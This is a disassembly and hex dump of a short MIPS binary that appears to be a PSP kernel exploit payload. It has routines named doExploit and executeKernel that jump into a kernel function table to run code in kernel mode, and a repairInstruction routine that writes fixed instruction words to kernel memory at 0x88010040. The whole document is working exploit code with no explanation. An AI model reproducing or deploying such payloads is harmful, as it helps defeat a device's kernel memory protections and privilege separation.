
; ==== Section .text - Address 0x00000000 Size 0x000000AC Flags 0x0006

; ======================================================
; Subroutine _start - Address 0x00000000 
_start:
	0x00000000: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x00000004: 0x2442004C 'L.B$' - addiu      $v0, $v0, 76
	0x00000008: 0xAC82000C '....' - sw         $v0, 12($a0) // repairInstruction
	
	0x0000000C: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x00000010: 0x24420088 '..B$' - addiu      $v0, $v0, 136
	0x00000014: 0xAC820000 '....' - sw         $v0, 0($a0) // stubScanner
	
	0x00000018: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x0000001C: 0x24420098 '..B$' - addiu      $v0, $v0, 152
	0x00000020: 0xAC820004 '....' - sw         $v0, 4($a0) // doExploit
	
	0x00000024: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x00000028: 0x24420034 '4.B$' - addiu      $v0, $v0, 52
	0x0000002C: 0x03E00008 '....' - jr         $ra
	0x00000030: 0xAC820008 '....' - sw         $v0, 8($a0) // executeKernel
	
	executeKernel
	0x00000034: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x00000038: 0x8C4300AC '..C.' - lw         $v1, 172($v0)
	0x0000003C: 0x3C028000 '...<' - lui        $v0, 0x8000
	0x00000040: 0x8C790010 '..y.' - lw         $t9, 16($v1) // KernelLibcTime
	0x00000044: 0x03200008 '.. .' - jr         $t9
	0x00000048: 0x00822025 '% ..' - or         $a0, $a0, $v0
	
	repairInstruction
	0x0000004C: 0x3C038801 '...<' - lui        $v1, 0x8801
	0x00000050: 0x3C023C03 '.<.<' - lui        $v0, 0x3C03
	0x00000054: 0x34640044 'D.d4' - ori        $a0, $v1, 0x44 // a0 = 0x88010044
	0x00000058: 0x34428801 '..B4' - ori        $v0, $v0, 0x8801 // v0 = 0x3C038801
	0x0000005C: 0x34630040 '@.c4' - ori        $v1, $v1, 0x40 // v1 = 0x88010040
	0x00000060: 0xAC620000 '..b.' - sw         $v0, 0($v1) // _sw(0x3C038801, 0x88010040)
	0x00000064: 0x3C028C65 'e..<' - lui        $v0, 0x8C65
	0x00000068: 0x34424D84 '.MB4' - ori        $v0, $v0, 0x4D84 // v0 = 0x8C654D84
	0x0000006C: 0xAC820000 '....' - sw         $v0, 0($a0) // _sw(0x8C654D84, 0x88010044)
	0x00000070: 0x03E00008 '....' - jr         $ra
	0x00000074: 0x00000000 '....' - nop        
	
	my_func
	0x00000078: 0x24030001 '...$' - li         $v1, 1
	0x0000007C: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x00000080: 0x03E00008 '....' - jr         $ra
	0x00000084: 0xAC4300B4 '..C.' - sw         $v1, 180($v0) // is_exploited = 1
	
	stubScanner
	0x00000088: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x0000008C: 0xAC4400AC '..D.' - sw         $a0, 172($v0) // tbl = arg0
	0x00000090: 0x03E00008 '....' - jr         $ra
	0x00000094: 0x00001021 '!...' - move       $v0, $zr // return 0
	
	doExploit
	0x00000098: 0x3C0208D2 '...<' - lui        $v0, 0x8D2
	0x0000009C: 0xAC4000B4 '..@.' - sw         $zr, 180($v0) // is_exploited = 0
	0x000000A0: 0x03E00008 '....' - jr         $ra
	0x000000A4: 0x00001021 '!...' - move       $v0, $zr // return 0
	
	0x000000A8: 0x88014640 '@F..' - lwl        $at, 17984($zr)

; ==== Section .data - Address 0x00000000 Size 0x000000AC Flags 0x0002
           - 00 01 02 03 | 04 05 06 07 | 08 09 0A 0B | 0C 0D 0E 0F - 0123456789ABCDEF
-------------------------------------------------------------------------------------
0x00000000 - D2 08 02 3C | 4C 00 42 24 | 0C 00 82 AC | D2 08 02 3C - ...<L.B$.......<
0x00000010 - 88 00 42 24 | 00 00 82 AC | D2 08 02 3C | 98 00 42 24 - ..B$.......<..B$
0x00000020 - 04 00 82 AC | D2 08 02 3C | 34 00 42 24 | 08 00 E0 03 - .......<4.B$....
0x00000030 - 08 00 82 AC | D2 08 02 3C | AC 00 43 8C | 00 80 02 3C - .......<..C....<
0x00000040 - 10 00 79 8C | 08 00 20 03 | 25 20 82 00 | 01 88 03 3C - ..y... .% .....<
0x00000050 - 03 3C 02 3C | 44 00 64 34 | 01 88 42 34 | 40 00 63 34 - .<.<D.d4..B4@.c4
0x00000060 - 00 00 62 AC | 65 8C 02 3C | 84 4D 42 34 | 00 00 82 AC - ..b.e..<.MB4....
0x00000070 - 08 00 E0 03 | 00 00 00 00 | 01 00 03 24 | D2 08 02 3C - ...........$...<
0x00000080 - 08 00 E0 03 | B4 00 43 AC | D2 08 02 3C | AC 00 44 AC - ......C....<..D.
0x00000090 - 08 00 E0 03 | 21 10 00 00 | D2 08 02 3C | B4 00 40 AC - ....!......<..@.
0x000000A0 - 08 00 E0 03 | 21 10 00 00 | 40 46 01 88 | -- -- -- -- - ....!...@F......
